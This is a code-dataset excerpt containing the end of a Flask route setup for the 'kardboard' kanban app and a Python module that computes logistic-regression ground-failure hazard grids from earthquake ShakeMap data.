app.config.get('EXCEPTIONAL_API_KEY', '')\n if exceptional_key:\n exceptional = Exceptional(app)\n app._exceptional = exceptional\n\n app.wsgi_app = FixGunicorn(app.wsgi_app)\n\n return app\n\napp = get_app()\ncache = Cache(app)\n\n\nfrom kardboard.views import (\n card,\n card_add,\n card_edit,\n card_delete,\n card_block,\n card_export,\n reports_index,\n report_throughput,\n report_cycle,\n report_cycle_distribution,\n report_flow,\n report_detailed_flow,\n done,\n report_service_class,\n report_leaderboard,\n login,\n logout,\n dashboard,\n person,\n quick,\n robots,\n favicon,\n state,\n team,\n)\n\napp.add_url_rule('/', 'state', state)\napp.add_url_rule('/card//', 'card', card, methods=[\"GET\", \"POST\"])\napp.add_url_rule('/card/add/', 'card_add', card_add, methods=[\"GET\", \"POST\"])\napp.add_url_rule('/card//edit/', 'card_edit', card_edit, methods=[\"GET\", \"POST\"])\napp.add_url_rule('/card//delete/', 'card_delete', card_delete, methods=[\"GET\", \"POST\"])\napp.add_url_rule('/card//block/', 'card_block', card_block, methods=[\"GET\", \"POST\"])\napp.add_url_rule('/card/export/', 'card_export', card_export)\napp.add_url_rule('/reports/', 'reports_index', reports_index)\napp.add_url_rule('/reports//throughput/', 'report_throughput', report_throughput)\napp.add_url_rule('/reports//throughput//', 'report_throughput', report_throughput)\napp.add_url_rule('/reports//cycle/', 'report_cycle', report_cycle)\napp.add_url_rule('/reports//cycle//', 'report_cycle', report_cycle)\napp.add_url_rule('/reports//cycle/from////', 'report_cycle', report_cycle)\napp.add_url_rule('/reports//cycle/distribution/', 'report_cycle_distribution', report_cycle_distribution)\napp.add_url_rule('/reports//cycle/distribution//', 'report_cycle_distribution', report_cycle_distribution)\napp.add_url_rule('/reports//flow/', 'report_flow', report_flow)\napp.add_url_rule('/reports//flow//', 'report_flow', report_flow)\napp.add_url_rule('/reports//flow/detail/', 'report_detailed_flow', report_detailed_flow)\napp.add_url_rule('/reports//flow/detail//', 'report_detailed_flow', report_detailed_flow)\napp.add_url_rule('/reports//done/', 'done', done)\napp.add_url_rule('/reports//done//', 'done', done)\napp.add_url_rule('/reports//classes/', 'report_service_class', report_service_class)\napp.add_url_rule('/reports//classes//', 'report_service_class', report_service_class)\napp.add_url_rule('/reports//leaderboard/', 'report_leaderboard', report_leaderboard)\napp.add_url_rule('/reports//leaderboard//', 'report_leaderboard', report_leaderboard)\napp.add_url_rule('/reports//leaderboard/-//', 'report_leaderboard', report_leaderboard)\napp.add_url_rule('/reports//leaderboard///', 'report_leaderboard', report_leaderboard)\napp.add_url_rule('/reports//leaderboard/-//', 'report_leaderboard', report_leaderboard)\napp.add_url_rule('/login/', 'login', login, methods=[\"GET\", \"POST\"])\napp.add_url_rule('/logout/', 'logout', logout)\napp.add_url_rule('/overview/', 'dashboard', dashboard)\napp.add_url_rule('/overview///', 'dashboard', dashboard)\napp.add_url_rule('/overview////', 'dashboard', dashboard)\napp.add_url_rule('/person//', 'person', person)\napp.add_url_rule('/quick/', 'quick', quick, methods=[\"GET\"])\napp.add_url_rule('/robots.txt', 'robots', robots,)\napp.add_url_rule('/team//', 'team', team)\napp.add_url_rule('/favicon.ico', 'favicon', favicon)\n","sub_path":"kardboard/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"406940579","text":"#!/usr/bin/env python\n\"\"\"\nThis module contains functions and class definitions for running forward\nmodels of models based on logistic regression.\n\"\"\"\n\n# stdlib imports\nimport numpy as np\nimport os.path\nimport re\nimport collections\nimport shutil\nimport tempfile\nfrom timeit import default_timer as timer\n\n# third party imports\nfrom mapio.shake import ShakeGrid\nfrom mapio.shake import getHeaderData\nfrom mapio.gmt import GMTGrid\nfrom mapio.gdal import GDALGrid\nfrom mapio.grid2d import Grid2D\nfrom mapio.geodict import GeoDict\n\nfrom gfail.temphdf import TempHdf\nfrom gfail.spatial import quickcut, trim_ocean\nfrom gfail.utilities import getFileType\nfrom gfail.stats import get_rangebeta\n\n# temporary until mapio is updated\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\nPARAM_PATTERN = 'b[0-9]+'\nLAYER_PATTERN = '_layer'\nTERM_PATTERN = 'term'\n\nSM_TERMS = ['MW', 'YEAR', 'MONTH', 'DAY', 'HOUR', 'pga', 'pgv', 'mmi']\nSM_GRID_TERMS = ['pga', 'pgv', 'mmi']\n# these will get np. prepended\nOPERATORS = ['log', 'log10', 'arctan', 'power', 'sqrt', 'minimum', 'pi']\nFLOATPAT = r'[+-]?(?=\\d*[.eE])(?=\\.?\\d)\\d*\\.?\\d*(?:[eE][+-]?\\d+)?'\nINTPAT = '[0-9]+'\nOPERATORPAT = r'[\\+\\-\\*\\/]*'\nMONTHS = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct',\n 'Nov', 'Dec']\n\n\nclass LogisticModel(object):\n def __init__(self, shakefile, config, uncertfile=None, saveinputs=False,\n slopefile=None, bounds=None, slopemod=None,\n trimfile=None):\n \"\"\"\n Sets up the logistic model\n\n Args:\n shakefile (str): Path to shakemap grid.xml file for the event.\n config: configobj object defining the model and its inputs. Only\n one model should be described in each config file.\n uncertfile (str): Path to uncertainty.xml file.\n saveinputs (bool): Save input layers as Grid2D objects in addition\n to the model? If false (the default), it will just output the\n model.\n slopefile (str): Optional path to slopefile that will be resampled\n to the other input files for applying thresholds. OVERWRITES\n VALUE IN CONFIG.\n bounds (dict): Default of None uses ShakeMap boundaries, otherwise\n a dictionary of boundaries to cut to like\n\n .. code-block:: python\n\n bounds = {\n 'xmin': lonmin, 'xmax': lonmax,\n 'ymin': latmin, 'ymax': latmax\n }\n slopemod (str): How slope input should be modified to be in\n degrees: e.g., ``np.arctan(slope) * 180. / np.pi`` or\n ``slope/100.`` (note that this may be in the config file\n already).\n trimfile (str): shapefile of earth's landmasses to use to cut\n offshore areas.\n \"\"\"\n mnames = getLogisticModelNames(config)\n if len(mnames) == 0:\n raise Exception('No config file found or problem with config '\n 'file format')\n if len(mnames) > 1:\n raise Exception('Config file contains more than one model which '\n 'is no longer allowed, update your config file '\n 'to the newer format')\n\n self.model = mnames[0]\n self.config = config\n cmodel = config[self.model]\n self.modeltype = cmodel['gfetype']\n self.coeffs = validateCoefficients(cmodel)\n # key = layer name, value = file name\n self.layers = validateLayers(cmodel)\n self.terms, timeField = validateTerms(cmodel, self.coeffs, self.layers)\n self.interpolations = validateInterpolations(cmodel, self.layers)\n self.units = validateUnits(cmodel)\n self.gmused = [value for term, value in cmodel['terms'].items()\n if 'pga' in value.lower() or 'pgv' in\n value.lower() or 'mmi' in value.lower()]\n self.modelrefs, self.longrefs, self.shortrefs = validateRefs(cmodel)\n # self.numstd = numstd\n self.clips = validateClips(cmodel, self.layers, self.gmused)\n self.notes = ''\n\n if cmodel['baselayer'] not in list(self.layers.keys()):\n raise Exception('You must specify a base layer corresponding to '\n 'one of the files in the layer section.')\n self.saveinputs = saveinputs\n if slopefile is None:\n try:\n self.slopefile = cmodel['slopefile']\n except BaseException:\n # print('Slopefile not specified in config, no slope '\n # 'thresholds will be applied\\n')\n self.slopefile = None\n else:\n self.slopefile = slopefile\n if slopemod is None:\n try:\n self.slopemod = cmodel['slopemod']\n except BaseException:\n self.slopemod = None\n\n # See if trimfile exists\n if trimfile is not None:\n if not os.path.exists(trimfile):\n print(\n 'trimfile defined does not exist: %s\\nOcean will not be '\n 'trimmed' % trimfile)\n self.trimfile = None\n elif os.path.splitext(trimfile)[1] != '.shp':\n print('trimfile must be a shapefile, ocean will not be '\n 'trimmed')\n self.trimfile = None\n else:\n self.trimfile = trimfile\n else:\n self.trimfile = None\n\n # Get month of event\n griddict, eventdict, specdict, fields, uncertainties = \\\n getHeaderData(shakefile)\n MONTH = MONTHS[eventdict['event_timestamp'].month - 1]\n\n # Figure out how/if need to cut anything\n geodict = ShakeGrid.getFileGeoDict(shakefile, adjust='res')\n if bounds is not None: # Make sure bounds are within ShakeMap Grid\n if geodict.xmin < geodict.xmax: # only if signs are not opposite\n if (geodict.xmin > bounds['xmin'] or\n geodict.xmax < bounds['xmax'] or\n geodict.ymin > bounds['ymin'] or\n geodict.ymax < bounds['ymax']):\n print('Specified bounds are outside shakemap area, using '\n 'ShakeMap bounds instead.')\n bounds = None\n\n if bounds is not None:\n tempgdict = GeoDict.createDictFromBox(\n bounds['xmin'], bounds['xmax'],\n bounds['ymin'], bounds['ymax'],\n geodict.dx, geodict.dy, inside=False)\n # If Shakemap geodict crosses 180/-180 line, fix geodict so\n # things don't break\n if geodict.xmin > geodict.xmax:\n if tempgdict.xmin < 0:\n geodict._xmin -= 360.\n else:\n geodict._xmax += 360.\n gdict = geodict.getBoundsWithin(tempgdict)\n else:\n gdict = geodict\n\n # Now find the layer that is our base layer and get the largest bounds\n # we can guarantee not to exceed shakemap bounds\n basefile = self.layers[cmodel['baselayer']]\n ftype = getFileType(basefile)\n if ftype == 'esri':\n basegeodict, firstcol = GDALGrid.getFileGeoDict(basefile)\n if basegeodict == gdict:\n sampledict = gdict\n else:\n sampledict = basegeodict.getBoundsWithin(gdict)\n elif ftype == 'gmt':\n basegeodict, firstcol = GMTGrid.getFileGeoDict(basefile)\n if basegeodict == gdict:\n sampledict = gdict\n else:\n sampledict = basegeodict.getBoundsWithin(gdict)\n else:\n raise Exception('All predictor variable grids must be a valid '\n 'GMT or ESRI file type.')\n\n # Do we need to subdivide baselayer?\n if 'divfactor' in self.config[self.model].keys():\n divfactor = float(self.config[self.model]['divfactor'])\n if divfactor != 1.:\n # adjust sampledict so everything will be resampled\n newxmin = sampledict.xmin - sampledict.dx / \\\n 2. + sampledict.dx / (2. * divfactor)\n newymin = sampledict.ymin - sampledict.dy / \\\n 2. + sampledict.dy / (2. * divfactor)\n newxmax = sampledict.xmax + sampledict.dx / \\\n 2. - sampledict.dx / (2. * divfactor)\n newymax = sampledict.ymax + sampledict.dy / \\\n 2. - sampledict.dy / (2. * divfactor)\n newdx = sampledict.dx / divfactor\n newdy = sampledict.dy / divfactor\n if np.abs(newxmax) > 180.:\n newxmax = np.sign(newxmax) * 180.\n if np.abs(newxmin) > 180.:\n newxmin = np.sign(newxmin) * 180.\n\n sampledict = GeoDict.createDictFromBox(\n newxmin, newxmax, newymin,\n newymax, newdx, newdy, inside=True)\n\n # Find slope thresholds, if applicable\n self.slopemin = 'none'\n self.slopemax = 'none'\n if self.slopefile is not None:\n try:\n self.slopemin = float(config[self.model]['slopemin'])\n self.slopemax = float(config[self.model]['slopemax'])\n except BaseException:\n print('Could not find slopemin and/or slopemax in config, '\n 'limits. No slope thresholds will be applied.')\n self.slopemin = 'none'\n self.slopemax = 'none'\n\n # Make temporary directory for hdf5 pytables file storage\n self.tempdir = tempfile.mkdtemp()\n\n # now load the shakemap, resampling and padding if necessary\n temp = ShakeGrid.load(shakefile) # , adjust='res')\n self.shakedict = temp.getShakeDict()\n self.eventdict = temp.getEventDict()\n self.shakemap = {}\n\n # Read both PGA and PGV in, may need them for thresholds\n for gm in ['pga', 'pgv']:\n junkfile = os.path.join(self.tempdir, 'temp.bil')\n GDALGrid.copyFromGrid(temp.getLayer(gm)).save(junkfile)\n if gm in self.interpolations.keys():\n intermeth = self.interpolations[gm]\n else:\n intermeth = 'bilinear'\n junkgrid = quickcut(junkfile, sampledict, precise=True,\n method=intermeth, override=True)\n if gm in self.clips:\n junkgrid.setData(np.clip(junkgrid.getData(),\n self.clips[gm][0], self.clips[gm][1]))\n self.shakemap[gm] = TempHdf(\n junkgrid, os.path.join(self.tempdir, '%s.hdf5' % gm))\n os.remove(junkfile)\n del(temp)\n\n # get updated geodict\n sampledict = junkgrid.getGeoDict()\n\n # take uncertainties into account, if available\n if uncertfile is not None:\n self.uncert = {}\n # try:\n # Only read in the ones that will be needed\n temp = ShakeGrid.load(uncertfile)\n already = []\n for gm in self.gmused:\n if 'pgv' in gm:\n gmsimp = 'pgv'\n elif 'pga' in gm:\n gmsimp = 'pga'\n elif 'mmi' in gm:\n gmsimp = 'mmi'\n if gmsimp in already:\n continue\n junkfile = os.path.join(self.tempdir, 'temp.bil')\n GDALGrid.copyFromGrid(temp.getLayer(\n 'std%s' % gmsimp)).save(junkfile)\n if gmsimp in self.interpolations.keys():\n intermeth = self.interpolations[gmsimp]\n else:\n intermeth = 'bilinear'\n junkgrid = quickcut(junkfile, sampledict, precise=True,\n method=intermeth, override=True)\n if gmsimp in self.clips:\n junkgrid.setData(\n np.clip(junkgrid.getData(), self.clips[gmsimp][0],\n self.clips[gmsimp][1]))\n self.uncert['std' + gmsimp] = TempHdf(\n junkgrid, os.path.join(self.tempdir,\n 'std%s.hdf5' % gmsimp))\n already.append(gmsimp)\n os.remove(junkfile)\n del(temp)\n # except:\n # print('Could not read uncertainty file, ignoring '\n # 'uncertainties')\n # self.uncert = None\n else:\n self.uncert = None\n\n # Load the predictor layers, save as hdf5 temporary files, put file\n # locations into a dictionary.\n\n # Will be replaced in the next section if a slopefile was defined\n self.nonzero = None\n\n # key = layer name, value = grid object\n self.layerdict = {}\n\n didslope = False\n for layername, layerfile in self.layers.items():\n start = timer()\n if isinstance(layerfile, list):\n for lfile in layerfile:\n if timeField == 'MONTH':\n if lfile.find(MONTH) > -1:\n layerfile = lfile\n # ftype = getFileType(layerfile)\n interp = self.interpolations[layername]\n temp = quickcut(layerfile, sampledict,\n precise=True, method=interp)\n if layername in self.clips:\n temp.setData(\n np.clip(temp.getData(),\n self.clips[layername][0],\n self.clips[layername][1]))\n self.layerdict[layername] = TempHdf(\n temp, os.path.join(self.tempdir,\n '%s.hdf5' % layername))\n del(temp)\n else:\n interp = self.interpolations[layername]\n temp = quickcut(layerfile, sampledict,\n precise=True, method=interp)\n if layername in self.clips:\n temp.setData(\n np.clip(temp.getData(),\n self.clips[layername][0],\n self.clips[layername][1]))\n # Convert unconsolidated sediments to more reasonable coeff\n if layername == 'rock':\n sub1 = temp.getData()\n # Change to mixed sed rock coeff\n sub1[sub1 <= -3.21] = -1.36\n temp.setData(sub1)\n self.notes += 'unconsolidated sediment coefficient ' \\\n 'changed to -1.36 (weaker) from -3.22 to ' \\\n 'better reflect that this ' \\\n 'unit is not actually strong\\n'\n self.layerdict[layername] = TempHdf(\n temp, os.path.join(self.tempdir, '%s.hdf5' % layername))\n td = temp.getGeoDict()\n if td != sampledict:\n raise Exception(\n 'Geodictionaries of resampled files do not match')\n\n if layerfile == self.slopefile:\n flag = 0\n if self.slopemin == 'none' and self.slopemax == 'none':\n flag = 1\n if self.slopemod is None:\n slope1 = temp.getData().astype(float)\n slope = 0\n else:\n try:\n slope = temp.getData().astype(float)\n slope1 = eval(self.slopemod)\n except BaseException:\n print('slopemod provided not valid, continuing '\n 'without slope thresholds.')\n flag = 1\n if flag == 0:\n nonzero = np.array(\n [(slope1 > self.slopemin) &\n (slope1 <= self.slopemax)])\n self.nonzero = nonzero[0, :, :]\n del(slope1)\n del(slope)\n else:\n # Still remove areas where the slope equals exactly\n # 0.0 to remove offshore liq areas.\n nonzero = np.array([slope1 != 0.0])\n self.nonzero = nonzero[0, :, :]\n del(slope1)\n didslope = True\n del(temp)\n\n print('Loading %s layer: %1.1f sec'\n % (layername, timer() - start))\n\n if didslope is False and self.slopefile is not None:\n # Slope didn't get read in yet\n temp = quickcut(self.slopefile, sampledict, precise=True,\n method='bilinear')\n flag = 0\n if self.slopemin == 'none' and self.slopemax == 'none':\n flag = 1\n if self.slopemod is None:\n slope1 = temp.getData().astype(float)\n slope = 0\n else:\n try:\n slope = temp.getData().astype(float)\n slope1 = eval(self.slopemod)\n except BaseException:\n print('slopemod provided not valid, continuing without '\n 'slope thresholds')\n flag = 1\n if flag == 0:\n nonzero = np.array([(slope1 > self.slopemin) &\n (slope1 <= self.slopemax)])\n self.nonzero = nonzero[0, :, :]\n del(slope1)\n del(slope)\n else:\n # Still remove areas where the slope equals exactly\n # 0.0 to remove offshore liq areas.\n nonzero = np.array([slope1 != 0.0])\n self.nonzero = nonzero[0, :, :]\n del(slope1)\n\n self.nuggets = [str(self.coeffs['b0'])]\n\n ckeys = sorted(self.terms.keys())\n for key in ckeys:\n term = self.terms[key]\n coeff = self.coeffs[key]\n self.nuggets.append('(%g * %s)' % (coeff, term))\n\n self.equation = ' + '.join(self.nuggets)\n self.geodict = sampledict\n\n def getEquations(self):\n \"\"\"\n Method for LogisticModel class to extract strings defining the\n equations for the model for median ground motions.\n\n Returns:\n equation: the equation for median ground motions,\n\n \"\"\"\n return self.equation\n\n def getGeoDict(self):\n \"\"\"\n Returns the geodictionary of the LogisticModel class defining bounds\n and resolution of model inputs and outputs.\n\n Returns:\n geodict: mapio geodict object\n \"\"\"\n return self.geodict\n\n def calculate(self, cleanup=True, rowmax=300, colmax=None):\n \"\"\"\n Calculate the model.\n\n Args:\n cleanup (bool): If True, delete temporary hdf5 files\n rowmax (int): Number of rows to compute at once; If None, all rows\n will be computed at once.\n colmax (int): Number of columns to compute at once; If None, all\n columns will be computed at once.\n Returns:\n dict: Dictionary containing the model results (and model inputs if\n saveinputs was set to True). See\n `the description `_\n of the structure.\n \"\"\"\n tk = list(self.shakemap.keys())[0]\n # Figure out what slices to do\n rowstarts, rowends, colstarts, colends = \\\n self.shakemap[tk].getSliceDiv(rowmax, colmax)\n\n # Make empty matrix to fill\n X = np.empty([self.geodict.ny, self.geodict.nx])\n\n # Loop through slices, appending output each time\n for rowstart, rowend, colstart, colend in \\\n zip(rowstarts, rowends, colstarts, colends):\n X[rowstart:rowend, colstart:colend] = eval(self.equation)\n\n P = 1 / (1 + np.exp(-X))\n\n if 'vs30max' in self.config[self.model].keys():\n vs30 = self.layerdict['vs30'].getSlice(\n None, None, None, None, name='vs30')\n P[vs30 > float(self.config[self.model]['vs30max'])] = 0.0\n\n if 'minpgv' in self.config[self.model].keys():\n pgv = self.shakemap['pgv'].getSlice(\n None, None, None, None, name='pgv')\n P[pgv < float(self.config[self.model]['minpgv'])] = 0.0\n\n if 'minpga' in self.config[self.model].keys():\n pga = self.shakemap['pga'].getSlice(\n None, None, None, None, name='pga')\n P[pga < float(self.config[self.model]['minpga'])] = 0.0\n\n if self.uncert is not None: # hard code for now\n if 'Zhu and others (2017)' in self.modelrefs['shortref']:\n if 'stddev' in self.layerdict.keys():\n stdX = self.layerdict['stddev'].getSlice()\n else:\n stdX = float(self.config[self.model]['default_stddev'])\n varX = stdX**2. + \\\n (self.coeffs['b1']**2. *\n self.uncert['stdpgv'].getSlice()**2.)\n varP = (np.exp(-X) / (np.exp(-X) + 1)**2.)**2. * varX\n if 'coverage' in self.config[self.model].keys():\n a = 0.4915\n b = 42.4\n c = 9.165\n # ((2*a*b*c*np.exp(2*c*P))/(b+np.exp(c*P))**3.)**2.*varP\n varL = ((2 * a * b * c * np.exp(-c * P)) /\n ((1 + b * np.exp(-c * P))**3.))**2. * varP\n std1 = np.sqrt(varL)\n else:\n std1 = np.sqrt(varP)\n elif 'Jessee' in self.modelrefs['shortref']:\n if 'stddev' in self.layerdict.keys():\n stdX = self.layerdict['stddev'].getSlice()\n else:\n stdX = float(self.config[self.model]['default_stddev'])\n cfs = self.coeffs\n slp = self.layerdict['slope']\n std = self.uncert['stdpgv']\n varX = stdX**2. + ((\n cfs['b1'] + cfs['b6'] *\n (np.arctan(slp.getSlice()) * 180 / np.pi))**2.\n * std.getSlice()**2.)\n varP = (np.exp(-X) / (np.exp(-X) + 1)**2.)**2. * varX\n if 'coverage' in self.config[self.model].keys():\n a = -7.592\n b = 5.237\n c = -3.042\n d = 4.035\n varL = (np.exp(a + b * P + c * P**2. + d * P**3.) *\n (b + 2. * P * c + 3. * d * P**2.))**2. * varP\n std1 = np.sqrt(varL)\n else:\n std1 = np.sqrt(varP)\n else:\n print('cannot do uncertainty for %s model, skipping' %\n self.modelrefs['shortref'])\n self.uncert = None\n std1 = None\n else:\n std1 = None\n\n # P needs to be converted to areal coverage AFTER dealing with uncert\n if 'coverage' in self.config[self.model].keys():\n eqn = self.config[self.model]['coverage']['eqn']\n P = eval(eqn)\n\n # Compute quantiles\n compute_quantiles = False\n mconf = self.config[self.model]\n if(('conf_int_probabilities' in mconf) and\n (std1 is not None)):\n compute_quantiles = True\n ci_probabilities = [\n float(cip) for cip in mconf['conf_int_probabilities']]\n\n if compute_quantiles:\n quantile_dict = {}\n pmax = float(mconf['maxprob'])\n beta_p = P / pmax * (((pmax * P - P**2) / std1**2) - 1)\n beta_q = (1 - P / pmax) * (((pmax * P - P**2) / std1**2) - 1)\n for ci_prob in ci_probabilities:\n min_quantile = str(np.round(100 * (1.0 - ci_prob) / 2.0, 1))\n max_quantile = str(np.round(\n 100 * (1 - ((1.0 - ci_prob)) / 2.0), 1))\n min_prob, max_prob = get_rangebeta(\n beta_p, beta_q, ci_prob, minlim=0, maxlim=pmax)\n quantile_dict[min_quantile] = min_prob\n quantile_dict[max_quantile] = max_prob\n\n if self.slopefile is not None and self.nonzero is not None:\n # Apply slope min/max limits\n print('applying slope thresholds')\n P = P * self.nonzero\n if std1 is not None:\n # No uncert for masked values\n std1[P == 0] = 0.\n if compute_quantiles:\n for q in quantile_dict.values():\n q[P == 0] = 0.\n\n # Stuff into Grid2D object\n if 'Jessee' in self.modelrefs['shortref']:\n if 'coverage' not in self.config[self.model].keys():\n units5 = 'Relative Hazard'\n else:\n units5 = 'Proportion of area affected'\n elif 'Zhu' in self.modelrefs['shortref']:\n if 'coverage' not in self.config[self.model].keys() and \\\n '2017' in self.modelrefs['shortref']:\n units5 = 'Relative Hazard'\n else:\n units5 = 'Proportion of area affected'\n else:\n units5 = 'Probability of any occurrence'\n\n shakedetail = (\n '%s_ver%s'\n % (self.shakedict['shakemap_id'],\n self.shakedict['shakemap_version']))\n description = {\n 'name': self.modelrefs['shortref'],\n 'longref': self.modelrefs['longref'],\n 'units': units5,\n 'shakemap': shakedetail,\n 'event_id': self.eventdict['event_id'],\n 'parameters': {'slopemin': self.slopemin,\n 'slopemax': self.slopemax,\n 'modeltype': self.modeltype,\n 'notes': self.notes}}\n if 'vs30max' in self.config[self.model].keys():\n description['vs30max'] = float(self.config[self.model]['vs30max'])\n if 'minpgv' in self.config[self.model].keys():\n description['minpgv'] = float(self.config[self.model]['minpgv'])\n\n Pgrid = Grid2D(P, self.geodict)\n if self.trimfile is not None:\n # Turn all offshore cells to nan\n Pgrid = trim_ocean(Pgrid, self.trimfile)\n rdict = collections.OrderedDict()\n rdict['model'] = {\n 'grid': Pgrid,\n 'label': '%s estimate - %s' % (self.modeltype.capitalize(),\n units5.title()),\n 'type': 'output',\n 'description': description\n }\n if self.uncert is not None:\n Stdgrid = Grid2D(std1, self.geodict)\n if self.trimfile is not None:\n Stdgrid = trim_ocean(\n Stdgrid, self.trimfile)\n rdict['std'] = {\n 'grid': Stdgrid,\n 'label': ('%s estimate - %s (std)'\n % (self.modeltype.capitalize(),\n units5.title())),\n 'type': 'output',\n 'description': description\n }\n if compute_quantiles:\n for quantile, qgrid in quantile_dict.items():\n Qgrid = Grid2D(qgrid, self.geodict)\n qname = \"quantile%s\" % quantile\n rdict[qname] = {\n 'grid': Qgrid,\n 'label': (\n '%s %sth percentile - %s'\n % (self.modeltype.capitalize(), quantile,\n units5.title())),\n 'type': 'output',\n 'description': description\n }\n\n # This step might swamp memory for higher resolution runs\n if self.saveinputs is True:\n for layername, layergrid in list(self.layerdict.items()):\n units = self.units[layername]\n if units is None:\n units = ''\n rdict[layername] = {\n 'grid': Grid2D(\n layergrid.getSlice(\n None, None, None, None, name=layername),\n self.geodict\n ),\n 'label': '%s (%s)' % (layername, units),\n 'type': 'input',\n 'description': {\n 'units': units,\n 'name': self.shortrefs[layername],\n 'longref': self.longrefs[layername]\n }\n }\n for gmused in self.gmused:\n if 'pga' in gmused:\n units = '%g'\n getkey = 'pga'\n elif 'pgv' in gmused:\n units = 'cm/s'\n getkey = 'pgv'\n elif 'mmi' in gmused:\n units = 'intensity'\n getkey = 'mmi'\n else:\n continue\n # Layer is derived from several input layers, skip\n # outputting this layer\n\n if getkey in rdict:\n continue\n\n layer = self.shakemap[getkey].getSlice(\n None, None, None, None, name=getkey)\n rdict[getkey] = {\n 'grid': Grid2D(layer, self.geodict),\n 'label': '%s (%s)' % (getkey.upper(), units),\n 'type': 'input',\n 'description': {\n 'units': units,\n 'shakemap': shakedetail\n }\n }\n if cleanup:\n shutil.rmtree(self.tempdir)\n return rdict\n\n\ndef getLogisticModelNames(config):\n \"\"\"\n Get the names of the models present in the configobj\n\n Args:\n config: configobj object defining the model and its inputs.\n\n Returns:\n list: list of model names.\n \"\"\"\n names = []\n lmodel_space = config\n for key, value in lmodel_space.items():\n if isinstance(value, str):\n continue\n else: # this is a model\n names.append(key)\n return names\n\n\ndef getAllGridFiles(indir):\n \"\"\"\n Get list of all gmt or esri (.grd, .bil) files in a directory.\n\n Args:\n indir (str): Directory to search.\n Returns:\n list: List of file names.\n \"\"\"\n # TODO MOVE TO MAPIO\n tflist = os.listdir(indir)\n flist = []\n for tf in tflist:\n fullfile = os.path.join(indir, tf)\n ftype = getFileType(fullfile)\n if ftype in ['gmt', 'esri']:\n flist.append(fullfile)\n return flist\n\n\ndef validateCoefficients(cmodel):\n \"\"\"\n Ensures coefficients provided in model description are valid and outputs\n a dictionary of the coefficients.\n\n Args:\n cmodel (dict): Sub-dictionary from config for specific model,\n for example:\n\n .. code-block:: python\n\n cmodel = config['test_model']\n\n Returns:\n dict: a dictionary of model coefficients named b0, b1, b2...\n \"\"\"\n coeffs = {}\n for key, value in cmodel['coefficients'].items():\n if re.search('b[0-9]*', key) is None:\n raise Exception('coefficients must be named b0, b1, ...')\n coeffs[key] = float(value)\n if 'b0' not in list(coeffs.keys()):\n raise Exception('coefficients must include an intercept '\n 'coefficient named b0.')\n return coeffs\n\n\ndef validateClips(cmodel, layers, gmused):\n \"\"\"\n Ensures coefficients provided in model description are valid and outputs\n a dictionary of the coefficients.\n\n Args:\n cmodel (dict): Sub-dictionary from config for specific model,\n for example:\n\n .. code-block:: python\n\n cmodel = config['test_model']\n layers: dictionary of layer names\n gmused (list): List of ground motion parameters used\n\n Returns:\n dict: a dictionary of clip values for each layer (if exists)\n \"\"\"\n clips = {}\n if 'clip' in cmodel:\n for key, value in cmodel['clip'].items():\n if key not in layers:\n if key not in gmused:\n x1 = [par for par in gmused if key in par]\n if len(x1) == 0:\n raise Exception(\n 'Clipping key %s does not match any layers'\n % key)\n clips[key] = (float(value[0]), float(value[1]))\n return clips\n\n\ndef validateLayers(cmodel):\n \"\"\"\n Ensures all input files required to run the model exist and are valid\n file types. Make sure all layers are available for area of run\n\n Args:\n cmodel (dict): Sub-dictionary from config for specific model,\n for example,\n\n .. code-block:: python\n\n cmodel = config['test_model']\n\n Returns:\n dict: a dictionary of file names, e.g.\n\n .. code-block:: python\n\n {\n 'slope': 'slopefile.bil',\n 'vs30': 'vs30.grd'\n }\n\n \"\"\"\n layers = {}\n longrefs = {}\n shortrefs = {}\n for key in cmodel['layers'].keys():\n for item, value in cmodel['layers'][key].items():\n if item == 'file':\n ftype = getFileType(value)\n if ftype == 'unknown':\n raise Exception('layer file %s is not a valid GMT or '\n 'ESRI file.' % value)\n if ftype == 'dir':\n value = getAllGridFiles(value)\n layers[key] = value\n elif item == 'shortref':\n shortrefs[key] = value\n elif item == 'longref':\n longrefs[key] = value\n return layers\n\n\ndef validateTerms(cmodel, coeffs, layers):\n \"\"\"\n Reformats model inputs from config file, replacing functions with numpy\n functions, inserting code for extracting data from each layer (required\n to run eval in the calculate step), addressing any time variables, and\n checks that term names match coefficient names.\n\n Args:\n cmodel (dict): Sub-dictionary from config for specific model,\n e.g.\n\n .. code-block:: python\n\n cmodel = config['test_model']\n\n coeffs (dict): Dictionary of model coefficients, e.g.\n\n .. code-block:: python\n\n {'b0': 3.5, 'b1': -0.01}\n\n layers (dict): Dictionary of file names for all input layers, e.g.\n\n .. code-block:: python\n\n {'slope': 'slopefile.bil', 'vs30': 'vs30.grd'}\n\n Returns:\n tuple: (terms, timeField), where\n - 'terms' is a dictionary of terms that form the model equation,\n e.g.\n\n .. code-block:: python\n\n {\n 'b1': \"self.layerdict['friction'].getData()\",\n 'b2': \"self.layerdict['slope'].getData()/100.\"\n }\n\n - 'timeField' indicates the time that is used to know which input\n file to read in, e.g. for monthly average precipitation, 'MONTH'.\n \"\"\"\n # TODO:\n # - Return a time field for every term, not just one global one.\n\n terms = {}\n timeField = None\n for key, value in cmodel['terms'].items():\n if key not in list(coeffs.keys()):\n raise Exception('Term names must match names of coefficients')\n # replace log with np.log, make sure variables are all in layers list,\n # etc.\n term, rem, tTimeField = checkTerm(value, layers)\n if tTimeField is not None:\n timeField = tTimeField\n if len(rem):\n msg = ('Term \"%s\" contains the unknown text fragment \"%s\". '\n 'This may cause the expression to fail.')\n tpl = (term, rem)\n raise Exception(msg % tpl)\n terms[key] = term\n return terms, timeField\n\n\ndef validateInterpolations(cmodel, layers):\n \"\"\"Validate logistic model interpolation.\n\n Args:\n cmodel (dict): Sub-dictionary from config for specific model.\n layers (dict): Dictionary of file names for all input layers.\n\n Returns:\n dict: Model interpolation methods.\n \"\"\"\n interpolations = {}\n for key, value in cmodel['interpolations'].items():\n if key not in list(layers.keys()):\n raise Exception(\n 'Interpolation key %s does not match any names of layers'\n % key)\n methods = ['linear', 'nearest', 'cubic', 'bilinear']\n if value not in methods:\n raise Exception(\n 'Interpolation method %s not in approved list of methods: %s'\n % (key, str(methods)))\n interpolations[key] = value\n for key in list(layers.keys()):\n if key not in list(interpolations.keys()):\n raise Exception(\n 'No interpolation method configured for layer %s' % key)\n return interpolations\n\n\ndef validateUnits(cmodel):\n 